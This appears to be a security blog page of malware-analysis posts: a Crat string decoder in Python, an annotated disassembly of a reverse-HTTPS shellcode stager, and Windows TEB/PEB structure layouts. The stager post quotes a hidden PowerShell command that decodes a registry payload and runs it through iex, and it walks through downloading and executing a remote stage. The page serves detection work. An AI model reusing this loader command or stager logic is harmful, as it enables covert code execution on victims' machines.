
python_Crat_strdecoder

[+] etc.. 2020. 8. 3. 15:44

 

reference : https://www.hauri.co.kr/security/security_view.html?intSeq=15&page=1&keyfield=&key=

 

#-*-coding:utf-8 -*-

import base64

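# Per-chunk key step applied by Operator(): one addend per key byte
# (0x28, 0x04, 0x20, 0x20), taken straight from the original decoder.
_OPKEY = [0x28, 0x4, 0x20, 0x20]


def Operator(key):
    """Step the rolling 4-byte XOR key after one 4-byte chunk has been decoded.

    Each key element gets its own addend from _OPKEY.  The sums are returned
    un-normalized (they may exceed 255); _carry_key() folds them back into
    bytes -- carrying into the next position -- before the next chunk is XORed.
    Net effect: the key behaves like a little-endian 32-bit counter that is
    incremented by 0x20200428 per chunk.

    Args:
        key: sequence of at most 4 ints (a 5th element raises IndexError, as
            the original did).
    Returns:
        list of ints, same length as *key*.
    """
    return [value + _OPKEY[i] for i, value in enumerate(key)]


def _carry_key(key: list[int]) -> list[int]:
    """Fold every key element back into 0..255, carrying overflow to the next element.

    Replaces the original hex-digit juggling (hex(v)[-3] / hex(v)[-2:]) with
    divmod; for the value range Operator() can produce (<= 0x128) the two are
    identical.  The carry out of the last element is dropped, i.e. the key
    wraps modulo 2**32.
    """
    normalized: list[int] = []
    carry = 0
    for value in key:
        carry, low = divmod(value + carry, 256)
        normalized.append(low)
    return normalized


def decode_entry(b64_enc_str) -> str:
    """Decode one Crat string blob: base64 -> [4-byte key][ciphertext] -> text.

    The ciphertext is consumed in 4-byte chunks; each chunk is XORed byte-wise
    with the current key, which is then stepped by Operator().  A trailing
    short chunk is padded with b"0" (as the original did) so the chunking is
    uniform, but the padding is stripped from the returned text instead of
    leaking junk characters into the output -- the only behavioural change
    versus the original script.  Bytes are mapped with chr(), so non-ASCII
    plaintext comes out as Latin-1 code points, exactly as before.

    Args:
        b64_enc_str: base64 text (str or bytes) of key + ciphertext.
    Returns:
        The decoded text; "" when nothing follows the 4-byte key.
    Raises:
        binascii.Error: malformed base64 (propagated from base64.b64decode).
    """
    blob = base64.b64decode(b64_enc_str)
    key = list(blob[:4])
    data = blob[4:]
    plain_len = len(data)

    # Pad up to a whole number of 4-byte chunks.
    data += b"0" * (-plain_len % 4)

    pieces: list[str] = []
    for offset in range(0, len(data), 4):
        key = _carry_key(key)  # bring every key byte back into 0..255 first
        chunk = data[offset:offset + 4]
        pieces.append("".join(chr(c ^ k) for c, k in zip(chunk, key)))
        key = Operator(key)  # step the key for the next chunk

    return "".join(pieces)[:plain_len]


def main() -> None:
    """Decode every whitespace-separated base64 entry in str_info.txt and print it."""
    with open('str_info.txt', mode='rt') as f:
        entries = f.read().split()
    for b64_enc_str in entries:
        print(decode_entry(b64_enc_str))


# Guarded so the decoder can be imported (and tested) without touching the file.
if __name__ == "__main__":
    main()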


yara_Crat_encStr

2020. 6. 5. 17:14


; shellcode found on Windows host. Payload was stored in the registry. Powershell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'਀਀').'਀਀'; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"
;
; NOTE(review): fileless loader -- the stage lives in a registry value whose key and
; value names consist of non-ASCII characters (hard to type or to spot in regedit),
; is decoded from base64/UTF-16 in memory and executed through iex.  Hunting cues:
; the SysWOW64 powershell.exe path (32-bit host, matching this x86 shellcode),
; -windowstyle hidden, FromBase64String + iex on one command line, and values
; under HKLM\SOFTWARE with non-printable names.

; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/
;
; Layout: 0x80000 calls over the api_call block (0x80006-0x8008e, Metasploit
; block_api), which resolves an export from a 32-bit hash of uppercase(module
; name) + export name (ror-13 accumulation, see below).  Every "push <hash> /
; call ebp" after 0x8008f is such a resolved call.  The hash constants and the
; WinINet flag values 0x84a03200 / 0x3380 are stable YARA anchors for this stager.

    0x00080000:  cld     cld                 ; DF = 0 so lodsb walks forward
    0x00080001:  call    0x8008f             ; pushes 0x80006 (= &api_call); 0x8008f pops it into ebp
; ---- api_call: caller pushes args, then the hash, then "call ebp" ----
    0x00080006:  pushal  pushal   ; 60      ; save all registers (0x20 bytes)
    0x00080007:  mov     ebp, esp ; 98 e5   ; [ebp+0x20] = return address, [ebp+0x24] = requested hash
    0x00080009:  xor     edx, edx ; 31 d2
    0x0008000B:  mov     edx, dword ptr fs:[edx + 0x30]   ; TEB+0x30 -> PEB (see the TEB layout further down this page)
    0x0008000F:  mov     edx, dword ptr [edx + 0xc]       ; PEB+0x0c -> PEB_LDR_DATA
    0x00080012:  mov     edx, dword ptr [edx + 0x14]      ; PEB_LDR_DATA+0x14 -> InMemoryOrderModuleList.Flink
; next_mod: edx points at LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks, so entry fields sit at (offset - 8)
    0x00080015:  mov     esi, dword ptr [edx + 0x28]      ; BaseDllName.Buffer (UTF-16 module name)
    0x00080018:  movzx   ecx, word ptr [edx + 0x26]       ; BaseDllName.MaximumLength = number of bytes to hash
    0x0008001C:  xor     edi, edi                         ; edi = running module-name hash
; loop_modname: hash the UTF-16 name byte by byte (the 0x00 high bytes are hashed too)
    0x0008001E:  xor     eax, eax
    0x00080020:  lodsb   al, byte ptr [esi]
    0x00080021:  cmp     al, 0x61                         ; 'a'
    0x00080023:  jl      0x80027
    0x00080025:  sub     al, 0x20                         ; fold a-z to A-Z: module names hash case-insensitively
    0x00080027:  ror     edi, 0xd                         ; hash = ror13(hash) + byte
    0x0008002A:  add     edi, eax
    0x0008002C:  loop    0x8001e
    0x0008002E:  push    edx                              ; save module list position ([ebp-4])
    0x0008002F:  push    edi                              ; save module hash ([ebp-8])
    0x00080030:  mov     edx, dword ptr [edx + 0x10]      ; DllBase (entry+0x18)
    0x00080033:  mov     eax, dword ptr [edx + 0x3c]      ; e_lfanew -> IMAGE_NT_HEADERS
    0x00080036:  add     eax, edx
    0x00080038:  mov     eax, dword ptr [eax + 0x78]      ; DataDirectory[EXPORT].VirtualAddress
    0x0008003B:  test    eax, eax
    0x0008003D:  je      0x80089                          ; module has no export table -> next module
    0x0008003F:  add     eax, edx                         ; eax = IMAGE_EXPORT_DIRECTORY
    0x00080041:  push    eax                              ; save export directory
    0x00080042:  mov     ecx, dword ptr [eax + 0x18]      ; NumberOfNames
    0x00080045:  mov     ebx, dword ptr [eax + 0x20]      ; AddressOfNames (RVA)
    0x00080048:  add     ebx, edx
; get_next_func: walk the name table from the last entry down
    0x0008004A:  jecxz   0x80088                          ; no names left -> drop export dir, next module
    0x0008004C:  dec     ecx
    0x0008004D:  mov     esi, dword ptr [ebx + ecx*4]     ; RVA of name[ecx]
    0x00080050:  add     esi, edx
    0x00080052:  xor     edi, edi                         ; edi = running function-name hash
; loop_funcname: same ror-13 hash over the ASCII export name, including its NUL
    0x00080054:  xor     eax, eax
    0x00080056:  lodsb   al, byte ptr [esi]
    0x00080057:  ror     edi, 0xd
    0x0008005A:  add     edi, eax
    0x0008005C:  cmp     al, ah                           ; ah is 0: stop after the terminating NUL
    0x0008005E:  jne     0x80054
    0x00080060:  add     edi, dword ptr [ebp - 8]         ; function hash += module hash
    0x00080063:  cmp     edi, dword ptr [ebp + 0x24]      ; matches the requested hash?
    0x00080066:  jne     0x8004a
    0x00080068:  pop     eax                              ; export directory
    0x00080069:  mov     ebx, dword ptr [eax + 0x24]      ; AddressOfNameOrdinals
    0x0008006C:  add     ebx, edx
    0x0008006E:  mov     cx, word ptr [ebx + ecx*2]       ; ordinal of name[ecx]
    0x00080072:  mov     ebx, dword ptr [eax + 0x1c]      ; AddressOfFunctions
    0x00080075:  add     ebx, edx
    0x00080077:  mov     eax, dword ptr [ebx + ecx*4]     ; function RVA
    0x0008007A:  add     eax, edx                         ; -> virtual address
    0x0008007C:  mov     dword ptr [esp + 0x24], eax      ; overwrite the saved EAX in the pushal frame (2 dwords above esp) so popal returns it in eax
    0x00080080:  pop     ebx    ; 5b                      ; discard saved module hash
    0x00080081:  pop     ebx    ; 5b                      ; discard saved list position
    0x00080082:  popal   popal  ; 61                      ; restore registers; eax = resolved address
    0x00080083:  pop     ecx    ; 59                      ; caller's return address
    0x00080084:  pop     edx    ; 5a                      ; drop the hash the caller pushed
    0x00080085:  push    ecx    ; 51                      ; put the return address back
    0x00080086:  jmp     eax    ; ff e0                   ; tail-call the API (stdcall: it cleans the args and returns to the caller)
; get_next_mod1
    0x00080088:  pop     eax    ; 58                      ; discard export directory
; get_next_mod
    0x00080089:  pop     edi                              ; discard module hash
    0x0008008A:  pop     edx                              ; list position
    0x0008008B:  mov     edx, dword ptr [edx]             ; Flink -> next module
    0x0008008D:  jmp     0x80015
; ---- end api_call ----
    0x0008008F:  pop     ebp                              ; ebp = &api_call; every "call ebp" below goes through it

; load wininet
    0x00080090:  push    0x74656e            ; Push the bytes 'wininet',0 onto the stack.
    0x00080095:  push    0x696e6977          ; ...
    0x0008009A:  push    esp                 ; Push a pointer to the "wininet" string on the stack.
    0x0008009B:  push    0x726774c           ; hash( "kernel32.dll", "LoadLibraryA" )
    0x000800A0:  call    ebp                 ; LoadLibraryA( "wininet" )
    0x000800A2:  call    0x80127             ; call-over-string: pushes 0x800a7 = address of the UA string that follows

; user agent string - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; ASU2JS)
; NOTE(review): bytes 0x800a7-0x8012b are not in this listing: the UA string itself and
; (presumably) the code at 0x80127 that pops its address into ecx, zeroes edi and pushes the
; first two InternetOpenA arguments -- ecx/edi are used as-is below.  The "ASU2JS" token is
; not part of any stock IE UA string and is a usable network signature.

    ; INTERNETAPI_(HINTERNET) InternetOpenA(
    ;   LPCSTR lpszAgent,
    ;   DWORD  dwAccessType,
    ;   LPCSTR lpszProxy,
    ;   LPCSTR lpszProxyBypass,
    ;   DWORD  dwFlags);
    0x0008012C:  push    edi                 ; lpszProxy (NULL) -- dwFlags / lpszProxyBypass are pushed in the unlisted bytes
    0x0008012D:  push    edi                 ; dwAccessType (0 = INTERNET_OPEN_TYPE_PRECONFIG: honours the user's proxy settings)
    0x0008012E:  push    ecx                 ; lpszAgent -> the UA string
    0x0008012F:  push    0xa779563a      ; hash( "wininet.dll", "InternetOpenA" )
    0x00080134:  call    ebp             ; eax = hInternet

    0x00080136:  jmp     0x801ce         ; -> jmp 0x80219 -> call 0x8013b, which pushes 0x8021e = hostname string (see url: below)

    ; void InternetConnectA(
    ;     HINTERNET     hInternet,
    ;     LPCSTR        lpszServerName,
    ;     INTERNET_PORT nServerPort,
    ;     LPCSTR        lpszUserName,
    ;     LPCSTR        lpszPassword,
    ;     DWORD         dwService,
    ;     DWORD         dwFlags,
    ;     DWORD_PTR     dwContext);
    0x0008013B:  pop     ebx             ; "return address" pushed by call 0x8013b = pointer to the hostname string
    0x0008013C:  xor     ecx, ecx        ; NULL
    0x0008013E:  push    ecx             ; DWORD_PTR dwContext (NULL)
    0x0008013F:  push    ecx             ; dwFlags (NULL)
    0x00080140:  push    3               ; DWORD dwService (INTERNET_SERVICE_HTTP)
    0x00080142:  push    ecx             ; password (NULL)
    0x00080143:  push    ecx             ; username (NULL)
    0x00080144:  push    0x1bb           ; port 443
    0x00080149:  push    ebx             ; hostname
    0x0008014A:  push    eax             ; HINTERNET hInternet
    0x0008014B:  push    0xc69f8957      ; hash( "wininet.dll", "InternetConnectA" )
    0x00080150:  call    ebp
    0x00080152:  mov     ebx, eax        ; save hConnect (also the retry entry point: 0x801c6 reloads it)

    0x00080154:  jmp     0x801d0         ; -> call 0x80156, which pushes 0x801d5 = request path string

    ; INTERNETAPI_(HINTERNET) HttpOpenRequestA(
    ;   HINTERNET hConnect,
    ;   LPCSTR    lpszVerb,
    ;   LPCSTR    lpszObjectName,
    ;   LPCSTR    lpszVersion,
    ;   LPCSTR    lpszReferrer,
    ;   LPCSTR    *lplpszAcceptTypes,
    ;   DWORD     dwFlags,
    ;   DWORD_PTR dwContext);
    0x00080156:  pop     ecx             ; pointer to the request path (pushed by call 0x80156)
    0x00080157:  xor     edx, edx        ; NULL
    0x00080159:  push    edx             ; dwContext (NULL)
    0x0008015A:  push    0x84a03200      ; ( 0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
                                         ;   0x80000000 |        ; INTERNET_FLAG_RELOAD
                                         ;   0x04000000 |        ; INTERNET_NO_CACHE_WRITE
                                         ;   0x00800000 |        ; INTERNET_FLAG_SECURE         (TLS on 443)
                                         ;   0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
                                         ;   0x00001000 |        ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
                                         ;   0x00002000 |        ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
                                         ;   0x00000200          ; INTERNET_FLAG_NO_UI
                                         ; NOTE(review): the two IGNORE_CERT_* bits already drop hostname and
                                         ; expiry checks; 0x8016e below removes the remaining checks, so any
                                         ; self-signed C2 certificate is accepted.
    0x0008015F:  push    edx             ; accept types (NULL)
    0x00080160:  push    edx             ; referrer (NULL)
    0x00080161:  push    edx             ; version (NULL)
    0x00080162:  push    ecx             ; url (request path)
    0x00080163:  push    edx             ; method (NULL -> WinINet defaults to GET)
    0x00080164:  push    eax             ; hConnection
    0x00080165:  push    0x3b2e55eb      ; hash( "wininet.dll", "HttpOpenRequestA" )
    0x0008016A:  call    ebp
    0x0008016C:  mov     esi, eax        ; hHttpRequest

    ; BOOLAPI InternetSetOptionA(
    ;   HINTERNET hInternet,
    ;   DWORD     dwOption,
    ;   LPVOID    lpBuffer,
    ;   DWORD     dwBufferLength);
    0x0008016E:  push    0x3380          ; 0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
                                         ; 0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
                                         ; 0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
                                         ; 0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
                                         ; 0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
                                         ; NOTE(review): together these disable certificate validation entirely
                                         ; (unknown CA, revocation, name, date, usage).  The DWORD is left on the
                                         ; stack and never popped -- harmless here, but the stack drifts by 4.
    0x00080173:  mov     eax, esp        ; &dwFlags (the value just pushed)

    0x00080175:  push    4               ; sizeof(dwFlags)
    0x00080177:  push    eax             ; &dwFlags
    0x00080178:  push    0x1f            ; DWORD dwOption (31 = INTERNET_OPTION_SECURITY_FLAGS)
    0x0008017A:  push    esi             ; hRequest
    0x0008017B:  push    0x869e4675      ; hash( "wininet.dll", "InternetSetOptionA" )
    0x00080180:  call    ebp

    ; BOOLAPI HttpSendRequestA(
    ;   HINTERNET hRequest,
    ;   LPCSTR    lpszHeaders,
    ;   DWORD     dwHeadersLength,
    ;   LPVOID    lpOptional,
    ;   DWORD     dwOptionalLength);
    0x00080182:  xor     edi, edi        ; NULL
    0x00080184:  push    edi             ; optional length
    0x00080185:  push    edi             ; optional
    0x00080186:  push    edi             ; dwHeadersLength
    0x00080187:  push    edi             ; headers
    0x00080188:  push    esi             ; hHttpRequest
    0x00080189:  push    0x7b18062d      ; hash( "wininet.dll", "HttpSendRequestA" )
    0x0008018E:  call    ebp
    0x00080190:  test    eax, eax        ; test for failure
    0x00080192:  je      0x801dc         ; failed -> exit path (see the note at 0x801d5)

; Proxy/auth handling (block_reverse_https_proxy): even after a successful send the stager
; shows InternetErrorDlg once; if it answers "retry", the request is re-issued from hConnect.
    0x00080194:  xor     edi, edi
    0x00080196:  test    esi, esi        ; hRequest NULL?
    0x00080198:  je      0x8019e
    0x0008019A:  mov     ecx, edi        ; dwError = 0
    0x0008019C:  jmp     0x801a7
    0x0008019E:  push    0x5de2c5aa     ; hash( "kernel32.dll", "GetLastError" )
    0x000801A3:  call    ebp
    0x000801A5:  mov     ecx, eax        ; dwError = GetLastError()
    0x000801A7:  push    0x315e2145     ; GetDesktopWindow (user32.dll) -> hWnd for the dialog
    0x000801AC:  call    ebp
    0x000801AE:  xor     edi, edi
    0x000801B0:  push    edi             ; lppvData (NULL)
    0x000801B1:  push    7               ; dwFlags: presumably FLAGS_ERROR_UI_FILTER_FOR_ERRORS | _CHANGE_OPTIONS | _GENERATE_DATA
    0x000801B3:  push    ecx             ; dwError
    0x000801B4:  push    esi             ; hRequest
    0x000801B5:  push    eax             ; hWnd
    0x000801B6:  push    0xbe057b7      ; InternetErrorDlg (wininet.dll)
    0x000801BB:  call    ebp
    0x000801BD:  mov     edi, 0x2f00     ; ERROR_INTERNET_FORCE_RETRY (12032)
    0x000801C2:  cmp     edi, eax
    0x000801C4:  jne     0x801ca         ; anything else -> go read the response
    0x000801C6:  mov     eax, ebx        ; eax = hConnect
    0x000801C8:  jmp     0x80154         ; -> jmp 0x801d0: re-open and resend the request
    0x000801CA:  xor     edi, edi
    0x000801CC:  jmp     0x801e3         ; -> allocate + download
    0x000801CE:  jmp     0x80219         ; trampoline from 0x80136 to the hostname call
    0x000801D0:  call    0x80156         ; pushes 0x801d5 (request path) and enters HttpOpenRequestA
; NOTE(review): 0x801d5-0x801db are the request path string, not code (the first byte, "das" = 0x2f,
; is '/'); the disassembler decodes the string bytes as instructions below.  The failure target
; 0x801dc lies inside this run.  Re-assembling the bytes those mnemonics encode
; (68 f0 b5 a2 56, then ff d5 at 0x801e1) gives "push 0x56a2b5f0 / call ebp", and 0x56a2b5f0
; matches the Metasploit hash for kernel32!ExitProcess -- every error path terminates the process.
    0x000801D5:  das     das
    0x000801D6:  push    ebx
    0x000801D7:  outsw   dx, word ptr [esi]
    0x000801D9:  xor     al, 0
    0x000801DB:  add     byte ptr [eax - 0x10], ch   ; 0x801dc.. = 68 f0 b5 a2 56 : push 0x56a2b5f0
    0x000801DE:  mov     ch, 0xa2
    0x000801E0:  push    esi
    0x000801E1:  call    ebp                        ; ExitProcess (via the hash above)

    0x000801E3:  push    0x40          ; PAGE_EXECUTE_READWRITE
    0x000801E5:  push    0x1000        ; MEM_COMMIT
    0x000801EA:  push    0x400000      ; stage allocation: 0x400000 = 4 MiB (not 8 MB as the upstream comment says)
    0x000801EF:  push    edi           ; NULL
    0x000801F0:  push    0xe553a458    ; hash( "kernel32.dll", "VirtualAlloc" )
    0x000801F5:  call    ebp           ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
                                       ; NOTE(review): RWX private allocation in the PowerShell process -- a
                                       ; classic memory-scan / ETW hunting signal.
    0x000801F7:  xchg    eax, ebx      ; ebx = buffer (write cursor); eax = old hConnect, discarded
    0x000801F8:  push    ebx           ; stage start address -- consumed by the final "ret"
    0x000801F9:  push    ebx           ; temporary slot for bytesRead
    0x000801FA:  mov     edi, esp      ; edi = &bytesRead
; download_more
    0x000801FC:  push    edi           ; &bytesRead
    0x000801FD:  push    0x2000        ; read length (8 KiB per call)
    0x00080202:  push    ebx           ; buffer (current write cursor)
    0x00080203:  push    esi           ; hRequest
    0x00080204:  push    0xe2899612    ; hash( "wininet.dll", "InternetReadFile" )
    0x00080209:  call    ebp
    0x0008020B:  test    eax, eax      ; InternetReadFile failed?
    0x0008020D:  je      0x801dc       ; -> ExitProcess path
    0x0008020F:  mov     eax, dword ptr [edi]   ; bytesRead
    0x00080211:  add     ebx, eax      ; buffer += bytes_received
    0x00080213:  test    eax, eax      ; 0 bytes = end of response
    0x00080215:  jne     0x801fc       ; otherwise keep reading
                                       ; NOTE(review): no bound against the 4 MiB allocation -- a response larger
                                       ; than that is written past the buffer (stager behaviour, not a bug to fix here).
    0x00080217:  pop     eax           ; clear the temporary storage
    0x00080218:  ret     ret           ; pops the stage start address -> executes the downloaded stage in RWX memory
    0x00080219:  call    0x8013b       ; InternetConnectA; pushes 0x8021e = address of the hostname string below

url:
	; 0x0008021E: 61                    ; first byte of the NUL-terminated hostname (call-over-string, read by "pop ebx" at 0x8013b)
	; url foobar.com                    ; hostname redacted by the original author

 

출처 : https://gist.github.com/jdferrell3/4db966da06f4fa77816a54d802aca0f8 


yara_signing_Exchange

2020. 5. 10. 02:21


data structure

[+] etc.. 2020. 4. 30. 18:15

TEB structure (32-bit layout; the _NT_TIB is its first member, at offset 0x000)


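/* 32-bit (x86) Thread Environment Block.  Each member is prefixed with its byte
 * offset from the TEB base, i.e. from fs:[0] in a 32-bit process.  The member
 * shellcode and anti-debug code care about most is 0x030 ProcessEnvironmentBlock
 * (fs:[0x30]) -- the api_call block earlier on this page starts its module walk
 * there.  NOTE(review): the layout is version-specific (this one carries
 * NT/2000/XP/Vista-era members); verify against the target build's ntdll symbols
 * before hard-coding any offset beyond the NtTib / PEB-pointer prefix. */
struct _TEB {
    0x000 _NT_TIB NtTib;
    0x01c void* EnvironmentPointer;
    0x020 _CLIENT_ID ClientId;
    0x028 void* ActiveRpcHandle;
    0x02c void* ThreadLocalStoragePointer;
    0x030 _PEB* ProcessEnvironmentBlock;  /* fs:[0x30]. In WinNT (incl. Win 2K, XP, and Vista), the most significant bit of the PEB pointer is typically never set, because high memory addresses are reserved for the OS. */
    0x034 DWORD LastErrorValue;           /* what GetLastError() returns */
    0x038 DWORD CountOfOwnedCriticalSections;
    0x03c void* CsrClientThread;
    0x040 void* Win32ThreadInfo;
    0x044 DWORD User32Reserved[26];
    0x0ac DWORD UserReserved[5];
    0x0c0 void* WOW32Reserved;
    0x0c4 DWORD CurrentLocale;
    0x0c8 DWORD FpSoftwareStatusRegister;
    0x0cc void* SystemReserved1[54];
    0x1a4 int ExceptionCode;
    0x1a8 _ACTIVATION_CONTEXT_STACK ActivationContextStack;
    0x1bc DWORD SpareBytes1[24];
    0x1d4 _GDI_TEB_BATCH GdiTebBatch;
    0x6b4 _CLIENT_ID RealClientId;
    0x6bc void* GdiCachedProcessHandle;
    0x6c0 DWORD GdiClientPID;
    0x6c4 DWORD GdiClientTID;
    0x6c8 void* GdiThreadLocalInfo;
    0x6cc DWORD Win32ClientInfo[62];
    0x7c4 void* glDispatchTable[233];
    0xb68 DWORD glReserved1[29];
    0xbdc void* glReserved2;
    0xbe0 void* glSectionInfo;
    0xbe4 void* glSection;
    0xbe8 void* glTable;
    0xbec void* glCurrentRC;
    0xbf0 void* glContext;
    0xbf4 DWORD LastStatusValue;
    0xbf8 _UNICODE_STRING StaticUnicodeString;
    0xc00 WORD StaticUnicodeBuffer[261];
    0xe0c void* DeallocationStack;
    0xe10 void* TlsSlots[64];
    0xf10 _LIST_ENTRY TlsLinks;
    0xf18 void* Vdm;
    0xf1c void* ReservedForNtRpc;
    0xf20 void* DbgSsReserved[2];
    0xf28 DWORD HardErrorsAreDisabled;
    0xf2c void* Instrumentation[16];
    0xf6c void* WinSockData;
    0xf70 DWORD GdiBatchCount;
    0xf74 UChar InDbgPrint;
    0xf75 UChar FreeStackOnTermination;
    0xf76 UChar HasFiberData;
    0xf77 UChar IdealProcessor;
    0xf78 DWORD Spare3;
    0xf7c void* ReservedForPerf;
    0xf80 void* ReservedForOle;
    0xf84 DWORD WaitingOnLoaderLock;
    0xf88 _Wx86ThreadState Wx86Thread;
    0xf94 void** TlsExpansionSlots;
    0xf98 DWORD ImpersonationLocale;
    0xf9c DWORD IsImpersonating;
    0xfa0 void* NlsCache;
    0xfa4 void* pShimData;
    0xfa8 DWORD HeapVirtualAffinity;
    0xfac void* CurrentTransactionHandle;
    0xfb0 _TEB_ACTIVE_FRAME* ActiveFrame;
};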

 

 

PEB structure


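/* 32-bit (x86) Process Environment Block, reached through TEB+0x030 (fs:[0x30]).
 * Members are prefixed with their byte offset.  Offsets used by the shellcode
 * on this page: 0x00c Ldr (module list walk).  Offsets worth knowing for
 * anti-debug review: 0x002 BeingDebugged (the byte IsDebuggerPresent-style
 * checks read) and 0x068 NtGlobalFlag (presumably the heap/debug flags a
 * debugger-launched process carries -- confirm per Windows version).
 * NOTE(review): closing "};" fixed (the page had ");"). */
struct _PEB {
    0x000 BYTE InheritedAddressSpace;
    0x001 BYTE ReadImageFileExecOptions;
    0x002 BYTE BeingDebugged;                  /* non-zero while a debugger is attached */
    0x003 BYTE SpareBool;
    0x004 void* Mutant;
    0x008 void* ImageBaseAddress;              /* base of the main executable */
    0x00c _PEB_LDR_DATA* Ldr;                  /* -> PEB_LDR_DATA (see below); shellcode reads [PEB+0xc] */
    0x010 _RTL_USER_PROCESS_PARAMETERS* ProcessParameters;
    0x014 void* SubSystemData;
    0x018 void* ProcessHeap;
    0x01c _RTL_CRITICAL_SECTION* FastPebLock;
    0x020 void* FastPebLockRoutine;
    0x024 void* FastPebUnlockRoutine;
    0x028 DWORD EnvironmentUpdateCount;
    0x02c void* KernelCallbackTable;
    0x030 DWORD SystemReserved[1];
    0x034 DWORD ExecuteOptions:2; // bit offset: 34, len=2
    0x034 DWORD SpareBits:30; // bit offset: 34, len=30
    0x038 _PEB_FREE_BLOCK* FreeList;
    0x03c DWORD TlsExpansionCounter;
    0x040 void* TlsBitmap;
    0x044 DWORD TlsBitmapBits[2];
    0x04c void* ReadOnlySharedMemoryBase;
    0x050 void* ReadOnlySharedMemoryHeap;
    0x054 void** ReadOnlyStaticServerData;
    0x058 void* AnsiCodePageData;
    0x05c void* OemCodePageData;
    0x060 void* UnicodeCaseTableData;
    0x064 DWORD NumberOfProcessors;
    0x068 DWORD NtGlobalFlag;
    0x070 _LARGE_INTEGER CriticalSectionTimeout;
    0x078 DWORD HeapSegmentReserve;
    0x07c DWORD HeapSegmentCommit;
    0x080 DWORD HeapDeCommitTotalFreeThreshold;
    0x084 DWORD HeapDeCommitFreeBlockThreshold;
    0x088 DWORD NumberOfHeaps;
    0x08c DWORD MaximumNumberOfHeaps;
    0x090 void** ProcessHeaps;
    0x094 void* GdiSharedHandleTable;
    0x098 void* ProcessStarterHelper;
    0x09c DWORD GdiDCAttributeList;
    0x0a0 void* LoaderLock;
    0x0a4 DWORD OSMajorVersion;
    0x0a8 DWORD OSMinorVersion;
    0x0ac WORD OSBuildNumber;
    0x0ae WORD OSCSDVersion;
    0x0b0 DWORD OSPlatformId;
    0x0b4 DWORD ImageSubsystem;
    0x0b8 DWORD ImageSubsystemMajorVersion;
    0x0bc DWORD ImageSubsystemMinorVersion;
    0x0c0 DWORD ImageProcessAffinityMask;
    0x0c4 DWORD GdiHandleBuffer[34];
    0x14c void (*PostProcessInitRoutine)();
    0x150 void* TlsExpansionBitmap;
    0x154 DWORD TlsExpansionBitmapBits[32];
    0x1d4 DWORD SessionId;
    0x1d8 _ULARGE_INTEGER AppCompatFlags;
    0x1e0 _ULARGE_INTEGER AppCompatFlagsUser;
    0x1e8 void* pShimData;
    0x1ec void* AppCompatInfo;
    0x1f0 _UNICODE_STRING CSDVersion;
    0x1f8 void* ActivationContextData;
    0x1fc void* ProcessAssemblyStorageMap;
    0x200 void* SystemDefaultActivationContextData;
    0x204 void* SystemAssemblyStorageMap;
    0x208 DWORD MinimumStackCommit;
};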

 

 

PEB -> LDR_DATA


/* Loader data reached through PEB+0x00c.  The three LIST_ENTRY heads link the
 * LDR_DATA_TABLE_ENTRY records of every loaded module (that entry layout is not
 * reproduced on this page).  The shellcode above reads InMemoryOrderModuleList
 * (offset 0x14); because each link sits at InMemoryOrderLinks inside its entry,
 * the shellcode's [edx+0x10] / [edx+0x26] / [edx+0x28] are entry fields at
 * 0x18 / 0x2e / 0x30 -- DllBase, BaseDllName.MaximumLength, BaseDllName.Buffer
 * (consistent with the comments in the listing; confirm against ntdll symbols). */
typedef struct _PEB_LDR_DATA
{
    0x00    ULONG         Length;                            /* Size of structure, used by ntdll.dll as structure version ID */
    0x04    BOOLEAN       Initialized;                       /* If set, loader data section for current process is initialized */
    0x08    PVOID         SsHandle;
    0x0c    LIST_ENTRY    InLoadOrderModuleList;             /* Pointer to LDR_DATA_TABLE_ENTRY structure. Previous and next module in load order */
    0x14    LIST_ENTRY    InMemoryOrderModuleList;           /* Pointer to LDR_DATA_TABLE_ENTRY structure. Previous and next module in memory placement order; the list the shellcode walks */
    0x1c    LIST_ENTRY    InInitializationOrderModuleList;   /* Pointer to LDR_DATA_TABLE_ENTRY structure. Previous and next module in initialization order */
} PEB_LDR_DATA,*PPEB_LDR_DATA; // +0x24


yara_Nemty_memoryLoader

2019. 9. 20. 10:53


Direct3D Hooking

2019. 8. 13. 10:40
